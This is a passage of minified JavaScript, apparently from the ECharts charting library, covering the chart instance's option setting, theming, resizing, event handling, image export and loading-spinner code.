e=[],n=0;n<arguments.length;n++)e[n]=arguments[n];if(!this.isDisposed())return d_(this,t,e);E_(this.id)}}function p_(t){return function(){for(var e=[],n=0;n<arguments.length;n++)e[n]=arguments[n];return d_(this,t,e)}}function d_(t,e,n){return n[0]=n[0]&&n[0].toLowerCase(),Kt.prototype[e].apply(t,n)}var f_,g_,v_,y_,m_,__,x_,b_,w_,S_,M_,T_,k_,C_,I_,D_,A_,P_,L_,O_=function(t){function e(){return null!==t&&t.apply(this,arguments)||this}return n(e,t),e}(Kt),R_=O_.prototype;R_.on=p_("on"),R_.off=p_("off");var N_=function(t){function e(e,n,i){var r=t.call(this,new Jy)||this;r._chartsViews=[],r._chartsMap={},r._componentsViews=[],r._componentsMap={},r._pendingActions=[],i=i||{},r.__v_skip=!0,r._dom=e;var o="canvas",a="auto",s=!1;r[a_]=1,i.ssr&&xo(function(t){var e=hu(t),n=e.dataIndex;if(null!=n){var i=mt();return i.set("series_index",e.seriesIndex),i.set("data_index",n),e.ssrType&&i.set("ssr_type",e.ssrType),i}});var l=r._zr=yo(e,{renderer:i.renderer||o,devicePixelRatio:i.devicePixelRatio,width:i.width,height:i.height,ssr:i.ssr,useDirtyRect:at(i.useDirtyRect,s),useCoarsePointer:at(i.useCoarsePointer,a),pointerSize:i.pointerSize});r._ssr=i.ssr,r._throttledZrFlush=_y(U(l.flush,l),17),r._updateTheme(n),r._locale=function(t){if(j(t)){var e=sd[t.toUpperCase()]||{};return t===rd||t===od?C(e):I(C(e),C(sd[ad]),!1)}return I(C(t),C(sd[ad]),!1)}(i.locale||ud),r._coordSysMgr=new sf;var u=r._api=I_(r);function c(t,e){return t.__prio-e.__prio}return mn(U_,c),mn(G_,c),r._scheduler=new Ly(r,u,G_,U_),r._messageCenter=new O_,r._initEvents(),r.resize=U(r.resize,r),l.animation.on("frame",r._onframe,r),S_(l,r),M_(l,r),dt(r),r}return n(e,t),e.prototype._onframe=function(){if(!this._disposed){var t=this._scheduler,e=this._model,n=this._api;if(P_(this),this[s_]){var i=this[s_].silent;this[o_]=!0,L_(this);try{f_(this),y_.update.call(this,null,this[s_].updateParams)}catch(t){throw this[o_]=!1,this[s_]=null,t}this._zr.flush(),this[o_]=!1,this[s_]=null,b_.call(this,i),w_.call(this,i)}else if(t.unfinished){var r=1;do{t.unfinished=!1;var o=c.getTime();t.performSeriesTasks(e),t.performDataProcessorTasks(e),__(this,e),t.performVisualTasks(e),C_(this,this._model,n,"remain",{}),r-=c.getTime()-o}while(r>0&&t.unfinished);t.unfinished||this._zr.flush()}}},e.prototype.getDom=function(){return this._dom},e.prototype.getId=function(){return this.id},e.prototype.getZr=function(){return this._zr},e.prototype.isSSR=function(){return this._ssr},e.prototype.setOption=function(t,e,n){if(!this[o_])if(this._disposed)E_(this.id);else{var i,r,o;if($(e)&&(n=e.lazyUpdate,i=e.silent,r=e.replaceMerge,o=e.transition,e=e.notMerge),this[o_]=!0,L_(this),!this._model||e){var a=new ag(this._api),s=this._theme,l=this._model=new eg;l.scheduler=this._scheduler,l.ssr=this._ssr,l.init(null,null,null,s,this._locale,a)}this._model.setOption(t,{replaceMerge:r},W_);var u={seriesTransition:o,optionChanged:!0};if(n)this[s_]={silent:i,updateParams:u},this[o_]=!1,this.getZr().wakeUp();else{try{f_(this),y_.update.call(this,null,u)}catch(t){throw this[s_]=null,this[o_]=!1,t}this._ssr||this._zr.flush(),this[s_]=null,this[o_]=!1,b_.call(this,i),w_.call(this,i)}}},e.prototype.setTheme=function(t,e){if(!this[o_])if(this._disposed)E_(this.id);else{var n=this._model;if(n){var i=e&&e.silent,r=null;this[s_]&&(null==i&&(i=this[s_].silent),r=this[s_].updateParams,this[s_]=null),this[o_]=!0,L_(this);try{this._updateTheme(t),n.setTheme(this._theme),f_(this),y_.update.call(this,{type:"setTheme"},r)}catch(t){throw this[o_]=!1,t}this[o_]=!1,b_.call(this,i),w_.call(this,i)}}},e.prototype._updateTheme=function(t){j(t)&&(t=Z_[t]),t&&((t=C(t))&&Cg(t,!0),this._theme=t)},e.prototype.getModel=function(){return this._model},e.prototype.getOption=function(){return this._model&&this._model.getOption()},e.prototype.getWidth=function(){return this._zr.getWidth()},e.prototype.getHeight=function(){return this._zr.getHeight()},e.prototype.getDevicePixelRatio=function(){return this._zr.painter.dpr||r.hasGlobalWindow&&window.devicePixelRatio||1},e.prototype.getRenderedCanvas=function(t){return this.renderToCanvas(t)},e.prototype.renderToCanvas=function(t){t=t||{};var e=this._zr.painter;return e.getRenderedCanvas({backgroundColor:t.backgroundColor||this._model.get("backgroundColor"),pixelRatio:t.pixelRatio||this.getDevicePixelRatio()})},e.prototype.renderToSVGString=function(t){t=t||{};var e=this._zr.painter;return e.renderToString({useViewBox:t.useViewBox})},e.prototype.getSvgDataURL=function(){var t=this._zr;return E(t.storage.getDisplayList(),function(t){t.stopAnimation(null,!0)}),t.painter.toDataURL()},e.prototype.getDataURL=function(t){if(!this._disposed){var e=(t=t||{}).excludeComponents,n=this._model,i=[],r=this;E(e,function(t){n.eachComponent({mainType:t},function(t){var e=r._componentsMap[t.__viewId];e.group.ignore||(i.push(e),e.group.ignore=!0)})});var o="svg"===this._zr.painter.getType()?this.getSvgDataURL():this.renderToCanvas(t).toDataURL("image/"+(t&&t.type||"png"));return E(i,function(t){t.group.ignore=!1}),o}E_(this.id)},e.prototype.getConnectedDataURL=function(t){if(!this._disposed){var e="svg"===t.type,n=this.group,i=Math.min,r=Math.max,o=1/0;if(j_[n]){var a=o,s=o,l=-1/0,u=-1/0,h=[],p=t&&t.pixelRatio||this.getDevicePixelRatio();E(X_,function(o,c){if(o.group===n){var p=e?o.getZr().painter.getSvgDom().innerHTML:o.renderToCanvas(C(t)),d=o.getDom().getBoundingClientRect();a=i(d.left,a),s=i(d.top,s),l=r(d.right,l),u=r(d.bottom,u),h.push({dom:p,left:d.left,top:d.top})}});var d=(l*=p)-(a*=p),f=(u*=p)-(s*=p),g=c.createCanvas(),v=yo(g,{renderer:e?"svg":"canvas"});if(v.resize({width:d,height:f}),e){var y="";return E(h,function(t){var e=t.left-a,n=t.top-s;y+='<g transform="translate('+e+","+n+')">'+t.dom+"</g>"}),v.painter.getSvgRoot().innerHTML=y,t.connectedBackgroundColor&&v.painter.setBackgroundColor(t.connectedBackgroundColor),v.refreshImmediately(),v.painter.toDataURL()}return t.connectedBackgroundColor&&v.add(new jl({shape:{x:0,y:0,width:d,height:f},style:{fill:t.connectedBackgroundColor}})),E(h,function(t){var e=new Hl({style:{x:t.left*p-a,y:t.top*p-s,image:t.dom}});v.add(e)}),v.refreshImmediately(),g.toDataURL("image/"+(t&&t.type||"png"))}return this.getDataURL(t)}E_(this.id)},e.prototype.convertToPixel=function(t,e,n){return m_(this,"convertToPixel",t,e,n)},e.prototype.convertToLayout=function(t,e,n){return m_(this,"convertToLayout",t,e,n)},e.prototype.convertFromPixel=function(t,e,n){return m_(this,"convertFromPixel",t,e,n)},e.prototype.containPixel=function(t,e){var n;if(!this._disposed)return E(Ca(this._model,t),function(t,i){i.indexOf("Models")>=0&&E(t,function(t){var r=t.coordinateSystem;if(r&&r.containPoint)n=n||!!r.containPoint(e);else if("seriesModels"===i){var o=this._chartsMap[t.__viewId];o&&o.containPoint&&(n=n||o.containPoint(e,t))}else 0},this)},this),!!n;E_(this.id)},e.prototype.getVisual=function(t,e){var n=Ca(this._model,t,{defaultMainType:"series"}),i=n.seriesModel;var r=i.getData(),o=n.hasOwnProperty("dataIndexInside")?n.dataIndexInside:n.hasOwnProperty("dataIndex")?r.indexOfRawIndex(n.dataIndex):null;return null!=o?function(t,e,n){switch(n){case"color":return t.getItemVisual(e,"style")[t.getVisual("drawType")];case"opacity":return t.getItemVisual(e,"style").opacity;case"symbol":case"symbolSize":case"liftZ":return t.getItemVisual(e,n)}}(r,o,e):rm(r,e)},e.prototype.getViewOfComponentModel=function(t){return this._componentsMap[t.__viewId]},e.prototype.getViewOfSeriesModel=function(t){return this._chartsMap[t.__viewId]},e.prototype._initEvents=function(){var t=this;E(z_,function(e){var n=function(n){var i,r=t.getModel(),o=n.target,a="globalout"===e;if(a?i={}:o&&am(o,function(t){var e=hu(t);if(e&&null!=e.dataIndex){var n=e.dataModel||r.getSeriesByIndex(e.seriesIndex);return i=n&&n.getDataParams(e.dataIndex,e.dataType,o)||{},!0}if(e.eventData)return i=A({},e.eventData),!0},!0),i){var s=i.componentType,l=i.componentIndex;"markLine"!==s&&"markPoint"!==s&&"markArea"!==s||(s="series",l=i.seriesIndex);var u=s&&null!=l&&r.getComponent(s,l),c=u&&t["series"===u.mainType?"_chartsMap":"_componentsMap"][u.__viewId];0,i.event=n,i.type=e,t._$eventProcessor.eventInfo={targetEl:o,packedEvent:i,model:u,view:c},t.trigger(e,i)}};n.zrEventfulCallAtLast=!0,t._zr.on(e,n,t)});var e=this._messageCenter;E(H_,function(n,i){e.on(i,function(e){t.trigger(i,e)})}),function(t,e,n){t.on("selectchanged",function(t){var i=n.getModel();t.isFromClick?(om("map","selectchanged",e,i,t),om("pie","selectchanged",e,i,t)):"select"===t.fromAction?(om("map","selected",e,i,t),om("pie","selected",e,i,t)):"unselect"===t.fromAction&&(om("map","unselected",e,i,t),om("pie","unselected",e,i,t))})}(e,this,this._api)},e.prototype.isDisposed=function(){return this._disposed},e.prototype.clear=function(){this._disposed?E_(this.id):this.setOption({series:[]},!0)},e.prototype.dispose=function(){if(this._disposed)E_(this.id);else{this._disposed=!0,this.getDom()&&La(this.getDom(),$_,"");var t=this,e=t._api,n=t._model;E(t._componentsViews,function(t){t.dispose(n,e)}),E(t._chartsViews,function(t){t.dispose(n,e)}),t._zr.dispose(),t._dom=t._model=t._chartsMap=t._componentsMap=t._chartsViews=t._componentsViews=t._scheduler=t._api=t._zr=t._throttledZrFlush=t._theme=t._coordSysMgr=t._messageCenter=null,delete X_[t.id]}},e.prototype.resize=function(t){if(!this[o_])if(this._disposed)E_(this.id);else{this._zr.resize(t);var e=this._model;if(this._loadingFX&&this._loadingFX.resize(),e){var n=e.resetOption("media"),i=t&&t.silent;this[s_]&&(null==i&&(i=this[s_].silent),n=!0,this[s_]=null),this[o_]=!0,L_(this);try{n&&f_(this),y_.update.call(this,{type:"resize",animation:A({duration:0},t&&t.animation)})}catch(t){throw this[o_]=!1,t}this[o_]=!1,b_.call(this,i),w_.call(this,i)}}},e.prototype.showLoading=function(t,e){if(this._disposed)E_(this.id);else if($(t)&&(e=t,t=""),t=t||"default",this.hideLoading(),Y_[t]){var n=Y_[t](this._api,e),i=this._zr;this._loadingFX=n,i.add(n)}},e.prototype.hideLoading=function(){this._disposed?E_(this.id):(this._loadingFX&&this._zr.remove(this._loadingFX),this._loadingFX=null)},e.prototype.makeActionFromEvent=function(t){var e=A({},t);return e.type=F_[t.type],e},e.prototype.dispatchAction=function(t,e){if(this._disposed)E_(this.id);else if($(e)||(e={silent:!!e}),V_[t.type]&&this._model)if(this[o_])this._pendingActions.push(t);else{var n=e.silent;x_.call(this,t,n);var i=e.flush;i?this._zr.flush():!1!==i&&r.browser.weChat&&this._throttledZrFlush(),b_.call(this,n),w_.call(this,n)}},e.prototype.updateLabelLayout=function(){sm.trigger("series:layoutlabels",this._model,this._api,{updatedSeries:[]})},e.prototype.appendData=function(t){if(this._disposed)E_(this.id);else{var e=t.seriesIndex,n=this.getModel().getSeriesByIndex(e);0,n.appendData(t),this._scheduler.unfinished=!0,this.getZr().wakeUp()}},e.internalField=function(){function t(t){t.clearColorPalette(),t.eachSeries(function(t){t.clearColorPalette()})}function e(t){for(var e=[],n=t.currentStates,i=0;i<n.length;i++){var r=n[i];"emphasis"!==r&&"blur"!==r&&"select"!==r&&e.push(r)}t.selected&&t.states.select&&e.push("select"),2===t.hoverState&&t.states.emphasis?e.push("emphasis"):1===t.hoverState&&t.states.blur&&e.push("blur"),t.useStates(e)}function i(t,e){if(!t.preventAutoZ){var n=Mp(t);e.eachRendered(function(t){return Tp(t,n.z,n.zlevel),!0})}}function o(t,e){e.eachRendered(function(t){if(!Eh(t)){var e=t.getTextContent(),n=t.getTextGuideLine();t.stateTransition&&(t.stateTransition=null),e&&e.stateTransition&&(e.stateTransition=null),n&&n.stateTransition&&(n.stateTransition=null),t.hasState()?(t.prevStates=t.currentStates,t.clearStates()):t.prevStates&&(t.prevStates=null)}})}function a(t,n){var i=t.getModel("stateAnimation"),r=t.isAnimationEnabled(),o=i.get("duration"),a=o>0?{duration:o,delay:i.get("delay"),easing:i.get("easing")}:null;n.eachRendered(function(t){if(t.states&&t.states.emphasis){if(Eh(t))return;if(t instanceof Bl&&function(t){var e=Cu(t);e.normalFill=t.style.fill,e.normalStroke=t.style.stroke;var n=t.states.select||{};e.selectFill=n.style&&n.style.fill||null,e.selectStroke=n.style&&n.style.stroke||null}(t),t.__dirty){var n=t.prevStates;n&&t.useStates(n)}if(r){t.stateTransition=a;var i=t.getTextContent(),o=t.getTextGuideLine();i&&(i.stateTransition=a),o&&(o.stateTransition=a)}t.__dirty&&e(t)}})}f_=function(t){var e;e=t._model,cm(e).prepare={};var n=t._scheduler;n.restorePipelines(t._zr,t._model),n.prepareStageTasks(),g_(t,!0),g_(t,!1),n.plan()},g_=function(t,e){for(var n=t._model,i=t._scheduler,r=e?t._componentsViews:t._chartsViews,o=e?t._componentsMap:t._chartsMap,a=t._zr,s=t._api,l=0;l<r.length;l++)r[l].__alive=!1;function u(t){var l=t.__requireNewView;t.__requireNewView=!1;var u="_ec_"+t.id+"_"+t.type,c=!l&&o[u];if(!c){var h=Ka(t.type),p=e?ay.getClass(h.main,h.sub):cy.getClass(h.sub);0,(c=new p).init(n,s),o[u]=c,r.push(c),a.add(c.group)}t.__viewId=c.__id=u,c.__alive=!0,c.__model=t,c.group.__ecComponentInfo={mainType:t.mainType,index:t.componentIndex},!e&&i.prepareView(c,t,n,s)}e?n.eachComponent(function(t,e){"series"!==t&&u(e)}):n.eachSeries(u);for(l=0;l<r.length;){var c=r[l];c.__alive?l++:(!e&&c.renderTask.dispose(),a.remove(c.group),c.dispose(n,s),r.splice(l,1),o[c.__id]===c&&delete o[c.__id],c.__id=c.group.__ecComponentInfo=null)}},v_=function(t,e,n,i,r){var o=t._model;if(o.setUpdatePayload(n),i){var a,s=function(t,e,n){var i={};i[e+"Id"]=t[e+"Id"],i[e+"Index"]=t[e+"Index"],i[e+"Name"]=t[e+"Name"];var r={mainType:e,query:i};return n&&(r.subType=n),r}(n,i,r),l=n.excludeSeriesId;null!=l&&(a=mt(),E(da(l),function(t){var e=ba(t,null);null!=e&&a.set(e,!0)})),o&&o.eachComponent(s,function(e){if(!(a&&null!=a.get(e.id)))if(_c(n))if(e instanceof Qv)n.type!==Pu||n.notBlur||e.get(["emphasis","disabled"])||function(t,e,n){var i=t.seriesIndex,r=t.getData(e.dataType);if(r){var o=Ma(r,e);o=(Y(o)?o[0]:o)||0;var a=r.getItemGraphicEl(o);if(!a)for(var s=r.count(),l=0;!a&&l<s;)a=r.getItemGraphicEl(l++);if(a){var u=hu(a);ac(i,u.focus,u.blurScope,n)}else{var c=t.get(["emphasis","focus"]),h=t.get(["emphasis","blurScope"]);null!=c&&ac(i,c,h,n)}}}(e,n,t._api);else{var i=lc(e.mainType,e.componentIndex,n.name,t._api),r=i.focusSelf,o=i.dispatchers;n.type===Pu&&r&&!n.notBlur&&sc(e.mainType,e.componentIndex,t._api),o&&E(o,function(t){n.type===Pu?Qu(t):Ju(t)})}else mc(n)&&e instanceof Qv&&(!function(t,e){if(mc(e)){var n=e.dataType,i=Ma(t.getData(n),e);Y(i)||(i=[i]),t[e.type===Nu?"toggleSelect":e.type===Ou?"select":"unselect"](i,n)}}(e,n,t._api),uc(e),A_(t))},t),o&&o.eachComponent(s,function(e){a&&null!=a.get(e.id)||u(t["series"===i?"_chartsMap":"_componentsMap"][e.__viewId])},t)}else E([].concat(t._componentsViews).concat(t._chartsViews),u);function u(i){i&&i.__alive&&i[e]&&i[e](i.__model,o,t._api,n)}},y_={prepareAndUpdate:function(t){f_(this),y_.update.call(this,t,t&&{optionChanged:null!=t.newOption})},update:function(e,n){var i=this._model,r=this._api,o=this._zr,a=this._coordSysMgr,s=this._scheduler;if(i){!function(t){cm(t).fullUpdate={}}(i),i.setUpdatePayload(e),s.restoreData(i,e),s.performSeriesTasks(i),a.create(i,r),sm.trigger("coordsys:aftercreate",i,r),s.performDataProcessorTasks(i,e),__(this,i),a.update(i,r),t(i),s.performVisualTasks(i,e);var l=i.get("backgroundColor")||"transparent";o.setBackgroundColor(l);var u=i.get("darkMode");null!=u&&"auto"!==u&&o.setDarkMode(u),T_(this,i,r,e,n),sm.trigger("afterupdate",i,r)}},updateTransform:function(t){var e=this,n=e._model,i=e._api;if(n){n.setUpdatePayload(t);var r=[];n.eachComponent(function(o,a){if(o!==du){var s=e.getViewOfComponentModel(a);if(s&&s.__alive)if(s.updateTransform){var l=s.updateTransform(a,n,i,t);l&&l.update&&r.push(s)}else r.push(s)}});var o=mt();n.eachSeries(function(r){var a=e._chartsMap[r.__viewId],s=r.pipelineContext;if(a.updateTransform&&!s.progressiveRender){var l=a.updateTransform(r,n,i,t);l&&l.update&&o.set(r.uid,1)}else o.set(r.uid,1)}),e._scheduler.performVisualTasks(n,t,{setDirty:!0,dirtyMap:o}),C_(e,n,i,t,{},o),sm.trigger("afterupdate",n,i)}},updateView:function(e){var n=this._model;n&&(n.setUpdatePayload(e),cy.markUpdateMethod(e,"updateView"),t(n),this._scheduler.performVisualTasks(n,e,{setDirty:!0}),T_(this,n,this._api,e,{}),sm.trigger("afterupdate",n,this._api))},updateVisual:function(e){var n=this,i=this._model;i&&(i.setUpdatePayload(e),i.eachSeries(function(t){t.getData().clearAllVisual()}),cy.markUpdateMethod(e,"updateVisual"),t(i),this._scheduler.performVisualTasks(i,e,{visualType:"visual",setDirty:!0}),i.eachComponent(function(t,r){if("series"!==t){var o=n.getViewOfComponentModel(r);o&&o.__alive&&o.updateVisual(r,i,n._api,e)}}),i.eachSeries(function(t){n._chartsMap[t.__viewId].updateVisual(t,i,n._api,e)}),sm.trigger("afterupdate",i,this._api))},updateLayout:function(t){y_.update.call(this,t)}},m_=function(t,e,n,i,r){if(t._disposed)E_(t.id);else{for(var o,a=t._model,s=t._coordSysMgr.getCoordinateSystems(),l=Ca(a,n),u=0;u<s.length;u++){var c=s[u];if(c[e]&&null!=(o=c[e](a,l,i,r)))return o}0}},__=function(t,e){var n=t._chartsMap,i=t._scheduler;e.eachSeries(function(t){i.updateStreamModes(t,n[t.__viewId])})},x_=function(t,e){var n=this,i=this.getModel(),r=t.type,o=t.escapeConnect,a=V_[r],s=(a.update||"update").split(":"),l=s.pop(),u=null!=s[0]&&Ka(s[0]);this[o_]=!0,L_(this);var c=[t],h=!1;t.batch&&(h=!0,c=V(t.batch,function(e){return(e=L(A({},e),t)).batch=null,e}));var p,d=[],f=[],g=a.nonRefinedEventType,v=mc(t),y=_c(t);if(y&&oc(this._api),E(c,function(e){var r=a.action(e,i,n._api);if(a.refineEvent?f.push(r):p=r,(p=p||A({},e)).type=g,d.push(p),y){var o=Ia(t),s=o.queryOptionMap,c=o.mainTypeSpecified?s.keys()[0]:"series";v_(n,l,e,c),A_(n)}else v?(v_(n,l,e,"series"),A_(n)):u&&v_(n,l,e,u.main,u.sub)}),"none"!==l&&!y&&!v&&!u)try{this[s_]?(f_(this),y_.update.call(this,t),this[s_]=null):y_[l].call(this,t)}catch(t){throw this[o_]=!1,t}if(p=h?{type:g,escapeConnect:o,batch:d}:d[0],this[o_]=!1,!e){var m=void 0;if(a.refineEvent){var _=a.refineEvent(f,t,i,this._api).eventContent;ct($(_)),(m=L({type:a.refinedEventType},_)).fromAction=t.type,m.fromActionPayload=t,m.escapeConnect=!0}var x=this._messageCenter;x.trigger(p.type,p),m&&x.trigger(m.type,m)}},b_=function(t){for(var e=this._pendingActions;e.length;){var n=e.shift();x_.call(this,n,t)}},w_=function(t){!t&&this.trigger("updated")},S_=function(t,e){t.on("rendered",function(n){e.trigger("rendered",n),!t.animation.isFinished()||e[s_]||e._scheduler.unfinished||e._pendingActions.length?t.refresh():e.trigger("finished")})},M_=function(t,e){t.on("mouseover",function(t){var n=am(t.target,yc);n&&(!function(t,e,n){var i=hu(t),r=lc(i.componentMainType,i.componentIndex,i.componentHighDownName,n),o=r.dispatchers,a=r.focusSelf;o?(a&&sc(i.componentMainType,i.componentIndex,n),E(o,function(t){return Ku(t,e)})):(ac(i.seriesIndex,i.focus,i.blurScope,n),"self"===i.focus&&sc(i.componentMainType,i.componentIndex,n),Ku(t,e))}(n,t,e._api),A_(e))}).on("mouseout",function(t){var n=am(t.target,yc);n&&(!function(t,e,n){oc(n);var i=hu(t),r=lc(i.componentMainType,i.componentIndex,i.componentHighDownName,n).dispatchers;r?E(r,function(t){return $u(t,e)}):$u(t,e)}(n,t,e._api),A_(e))}).on("click",function(t){var n=am(t.target,function(t){return null!=hu(t).dataIndex},!0);if(n){var i=n.selected?"unselect":"select",r=hu(n);e._api.dispatchAction({type:i,dataType:r.dataType,dataIndexInside:r.dataIndex,seriesIndex:r.seriesIndex,isFromClick:!0})}})},T_=function(t,e,n,i,r){!function(t){var e=[],n=[],i=!1;if(t.eachComponent(function(t,r){var o=r.get("zlevel")||0,a=r.get("z")||0,s=r.getZLevelKey();i=i||!!s,("series"===t?n:e).push({zlevel:o,z:a,idx:r.componentIndex,type:t,key:s})}),i){var r,o,a=e.concat(n);mn(a,function(t,e){return t.zlevel===e.zlevel?t.z-e.z:t.zlevel-e.zlevel}),E(a,function(e){var n=t.getComponent(e.type,e.idx),i=e.zlevel,a=e.key;null!=r&&(i=Math.max(r,i)),a?(i===r&&a!==o&&i++,o=a):o&&(i===r&&i++,o=""),r=i,n.setZLevel(i)})}}(e),k_(t,e,n,i,r),E(t._chartsViews,function(t){t.__alive=!1}),C_(t,e,n,i,r),E(t._chartsViews,function(t){t.__alive||t.remove(e,n)})},k_=function(t,e,n,r,s,l){E(l||t._componentsViews,function(t){var s=t.__model;o(s,t),t.render(s,e,n,r),i(s,t),a(s,t)})},C_=function(t,e,n,s,l,u){var c=t._scheduler;l=A(l||{},{updatedSeries:e.getSeries()}),sm.trigger("series:beforeupdate",e,n,l);var h=!1;e.eachSeries(function(e){var n=t._chartsMap[e.__viewId];n.__alive=!0;var i=n.renderTask;c.updatePayload(i,s),o(e,n),u&&u.get(e.uid)&&i.dirty(),i.perform(c.getPerformArgs(i))&&(h=!0),n.group.silent=!!e.get("silent"),function(t,e){var n=t.get("blendMode")||null;e.eachRendered(function(t){t.isGroup||(t.style.blend=n)})}(e,n),uc(e)}),c.unfinished=h||c.unfinished,sm.trigger("series:layoutlabels",e,n,l),sm.trigger("series:transition",e,n,l),e.eachSeries(function(e){var n=t._chartsMap[e.__viewId];i(e,n),a(e,n)}),function(t,e){var n=t._zr;if("canvas"!==n.painter.type)return;var i=n.storage,o=0;i.traverse(function(t){t.isGroup||o++});var a=o>at(e.get("hoverLayerThreshold"),Nf.hoverLayerThreshold)&&!r.node&&!r.worker;(t._usingTHL||a)&&(e.eachSeries(function(e){if(!e.preventUsingHoverLayer){var n=t._chartsMap[e.__viewId];n.__alive&&n.eachRendered(function(t){var e=t.states.emphasis;e&&2!==e.hoverLayer&&(e.hoverLayer=a?1:0)})}}),t._usingTHL=a)}(t,e),sm.trigger("series:afterupdate",e,n,l)},A_=function(t){t[l_]=!0,t.getZr().wakeUp()},L_=function(t){t[a_]=(t[a_]+1)%1e6},P_=function(t){t[l_]&&(t.getZr().storage.traverse(function(t){Eh(t)||e(t)}),t[l_]=!1)},I_=function(t){return new(function(e){function i(){return null!==e&&e.apply(this,arguments)||this}return n(i,e),i.prototype.getCoordinateSystems=function(){return t._coordSysMgr.getCoordinateSystems()},i.prototype.getComponentByElement=function(e){for(;e;){var n=e.__ecComponentInfo;if(null!=n)return t._model.getComponent(n.mainType,n.index);e=e.parent}},i.prototype.enterEmphasis=function(e,n){Qu(e,n),A_(t)},i.prototype.leaveEmphasis=function(e,n){Ju(e,n),A_(t)},i.prototype.enterBlur=function(e){tc(e),A_(t)},i.prototype.leaveBlur=function(e){ec(e),A_(t)},i.prototype.enterSelect=function(e){nc(e),A_(t)},i.prototype.leaveSelect=function(e){ic(e),A_(t)},i.prototype.getModel=function(){return t.getModel()},i.prototype.getViewOfComponentModel=function(e){return t.getViewOfComponentModel(e)},i.prototype.getViewOfSeriesModel=function(e){return t.getViewOfSeriesModel(e)},i.prototype.getECUpdateCycleVersion=function(){return t[a_]},i.prototype.usingTHL=function(){return t._usingTHL},i}(Mu))(t)},D_=function(t){function e(t,e){for(var n=0;n<t.length;n++){t[n][c_]=e}}E(F_,function(n,i){t._messageCenter.on(i,function(n){if(j_[t.group]&&0!==t[c_]){if(n&&n.escapeConnect)return;var i=t.makeActionFromEvent(n),r=[];E(X_,function(e){e!==t&&e.group===t.group&&r.push(e)}),e(r,0),E(r,function(t){1!==t[c_]&&t.dispatchAction(i)}),e(r,2)}})})}}(),e}(Kt),B_=N_.prototype;B_.on=h_("on"),B_.off=h_("off"),B_.one=function(t,e,n){var i=this;la(),this.on.call(this,t,function n(){for(var r=[],o=0;o<arguments.length;o++)r[o]=arguments[o];e&&e.apply&&e.apply(this,r),i.off(t,n)},n)};var z_=["click","dblclick","mouseover","mouseout","mousemove","mousedown","mouseup","globalout","contextmenu"];function E_(t){0}var V_={},F_={},H_={},G_=[],W_=[],U_=[],Z_={},Y_={},X_={},j_={},q_=+new Date-0,K_=+new Date-0,$_="_echarts_instance_";function Q_(t){j_[t]=!1}var J_=Q_;function tx(t){return X_[function(t,e){return t.getAttribute?t.getAttribute(e):t[e]}(t,$_)]}function ex(t,e){Z_[t]=e}function nx(t){R(W_,t)<0&&W_.push(t)}function ix(t,e){px(G_,t,e,2e3)}function rx(t){ax("afterinit",t)}function ox(t){ax("afterupdate",t)}function ax(t,e){sm.on(t,e)}function sx(t,e,n){var i,r,o,a,s;function l(t){return t.toLowerCase()}X(e)&&(n=e,e=""),$(t)?(i=t.type,r=t.event,a=t.update,s=t.publishNonRefinedEvent,n||(n=t.action),o=t.refineEvent):(i=t,r=e),r=l(r||i);var u=o?l(i):r;V_[i]||(ct(u_.test(i)&&u_.test(r)),o&&ct(r!==i),V_[i]={actionType:i,refinedEventType:r,nonRefinedEventType:u,update:a,action:n,refineEvent:o},H_[r]=1,o&&s&&(H_[u]=1),F_[u]=i)}function lx(t,e){sf.register(t,e)}function ux(t,e){px(U_,t,e,1e3,"layout",!0)}function cx(t,e){px(U_,t,e,3e3,"visual",!0)}var hx=[];function px(t,e,n,i,r,o){if((X(e)||$(e))&&(n=e,e=i),!(R(hx,n)>=0)){hx.push(n);var a=Ly.wrapStageHandler(n,r);a.__prio=e,a.__raw=n,t.push(a)}}function dx(t,e){Y_[t]=e}function fx(t,e,n){var i=um("registerMap");i&&i(t,e,n)}var gx=function(t){var e=(t=C(t)).type,n="";e||ua(n);var i=e.split(":");2!==i.length&&ua(n);var r=!1;"echarts"===i[0]&&(e=i[1],r=!0),t.__isBuiltIn=r,yv.set(e,t)};function vx(t,e,n,i){return{eventContent:{selected:cc(n),isFromClick:e.isFromClick||!1}}}cx(n_,Cy),cx(i_,Dy),cx(i_,Ay),cx(n_,nm),cx(i_,im),cx(7e3,e_),nx(Cg),ix(900,Ig),dx("default",function(t,e){L(e=e||{},{text:"loading",textColor:Cf.color.primary,fontSize:12,fontWeight:"normal",fontStyle:"normal",fontFamily:"sans-serif",maskColor:"rgba(255,255,255,0.8)",showSpinner:!0,color:Cf.color.theme[0],spinnerRadius:10,lineWidth:5,zlevel:0});var n=new ho,i=new jl({style:{fill:e.maskColor},zlevel:e.zlevel,z:1e4});n.add(i);var r,o=new Ql({style:{text:e.text,fill:e.textColor,fontSize:e.fontSize,fontWeight:e.fontWeight,fontStyle:e.fontStyle,fontFamily:e.fontFamily},zlevel:e.zlevel,z:10001}),a=new jl({style:{fill:"none"},textContent:o,textConfig:{position:"right",distance:10},zlevel:e.zlevel,z:10001});return n.add(a),e.showSpinner&&((r=new yh({shape:{startAngle:-Py/2,endAngle:-Py/2+.1,r:e.spinnerRadius},style:{stroke:e.color,lineCap:"round",lineWidth:e.lineWidth},zlevel:e.zlevel,z:10001})).animateShape(!0).when(1e3,{endAngle:3*Py/2}).start("circularInOut"),r.animateShape(!0).when(1e3,{startAngle:3*Py/2}).delay(300).start("circularInOut"),n.add(r)),n.resize=function(){var n=o.getBoundingRect().width,s=e.showSpinner?e.spinnerRadius:0,l=(t.getWidth()-2*s-(e.showSpinner&&n?10:0)-n)/2-(e.showSpinner&&n?0:5+n/2)+(e.showSpinner?0:n/2)+(n?0:s),u=t.getHeight()/2;e.showSpinner&&r.setShape({cx:l,cy:u}),a.setShape({x:l-s,y:u-s,width:2*s,height:2*s}),i.setShape({x:0,y:0,width:t.getWidth(),height:t.getHeight()})},n.resize(),n}),sx({type:Pu,event:Pu,update:Pu},St),sx({type:Lu,event:Lu,update:Lu},St),sx({type:Ou,event:Bu,update:Ou,action:St,refineEvent:vx,publishNonRefinedEvent:!0}),sx({type:Ru,event:Bu,update:Ru,action:St,refineEvent:vx,publishNonRefinedEvent:!0}),sx({type:Nu,event:Bu,update:Nu,action:St,refineEvent:vx,publishNonRefinedEvent:!0}),ex("default",{}),ex("dark",Qy);var 